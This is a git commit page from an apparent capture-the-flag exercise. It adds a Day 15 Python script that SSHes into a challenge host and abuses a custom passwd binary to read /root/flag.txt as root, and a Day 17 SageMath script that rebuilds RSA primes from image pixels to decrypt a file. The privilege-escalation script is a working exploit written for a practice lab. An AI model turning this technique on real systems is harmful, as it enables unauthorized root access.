Day 15 + Day 17
This commit is contained in:
parent
6019eec2ba
commit
c3399c89ef
17
Day 15/exploit.py
Normal file
17
Day 15/exploit.py
Normal file
@ -0,0 +1,17 @@
|
||||
import paramiko
|
||||
|
||||
HOSTNAME = "04806b1a-dd1f-4eaf-b19d-b6df4db1cce5.rdocker.vuln.land"
|
||||
USERNAME = "challenge"
|
||||
PASSWORD = "challenge"
|
||||
|
||||
if __name__ == "__main__":
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
ssh.connect(HOSTNAME, 22, USERNAME, PASSWORD)
|
||||
stdin, stdout, stderr = ssh.exec_command("SALAMI=https://www.youtube.com/watch?v=dQw4w9WgXcQ /usr/bin/passwd -E")
|
||||
stdin.write(b"cat /root/flag.txt\n")
|
||||
stdin.flush()
|
||||
stdin.close()
|
||||
flag = stdout.read().split(b"\n")[0].decode()
|
||||
print("[+] Flag:", flag)
|
||||
ssh.close()
|
BIN
Day 15/passwd
Executable file
BIN
Day 15/passwd
Executable file
Binary file not shown.
46
Day 17/decrypt.sage
Normal file
46
Day 17/decrypt.sage
Normal file
@ -0,0 +1,46 @@
|
||||
from Crypto.Util.number import long_to_bytes, bytes_to_long
|
||||
from PIL import Image
|
||||
from hackingscripts import util
|
||||
|
||||
def extract_bin(pixels):
|
||||
bin_stream = ""
|
||||
for p in pixels:
|
||||
r = util.lpad(bin(p[0])[2:], n, "0")
|
||||
g = util.lpad(bin(p[1])[2:], n, "0")
|
||||
b = util.lpad(bin(p[2])[2:], n, "0")
|
||||
bin_stream += r + g + b
|
||||
return bin_stream
|
||||
|
||||
if __name__ == "__main__":
|
||||
key_img = Image.open("key.png")
|
||||
pix = key_img.load()
|
||||
width, height = key_img.size
|
||||
|
||||
pixels_p = []
|
||||
pixels_q = []
|
||||
end_p = (54, 20)
|
||||
end_q = (54, 41)
|
||||
|
||||
for y in range(height):
|
||||
for x in range(width):
|
||||
if y <= end_p[1]:
|
||||
pixels_p.append(pix[x,y])
|
||||
else:
|
||||
pixels_q.append(pix[x,y])
|
||||
|
||||
p = int(extract_bin(pixels_p), 2)
|
||||
q = int(extract_bin(pixels_q), 2)
|
||||
|
||||
e = 0x10001
|
||||
n = p * q
|
||||
phi_n = (p - 1) * (q - 1)
|
||||
d = power_mod(e, -1, phi_n)
|
||||
|
||||
with open("flag.enc", "rb") as f:
|
||||
data = f.read()
|
||||
ct = bytes_to_long(data)
|
||||
pt = power_mod(ct, d, n)
|
||||
pt_b = long_to_bytes(pt)
|
||||
with open("decrypted.png", "wb") as g:
|
||||
g.write(pt_b)
|
||||
|
BIN
Day 17/decrypted.png
Normal file
BIN
Day 17/decrypted.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 5.6 KiB |
BIN
Day 17/flag.enc
Normal file
BIN
Day 17/flag.enc
Normal file
Binary file not shown.
BIN
Day 17/key.png
Normal file
BIN
Day 17/key.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 4.7 KiB |
Loading…
Reference in New Issue
Block a user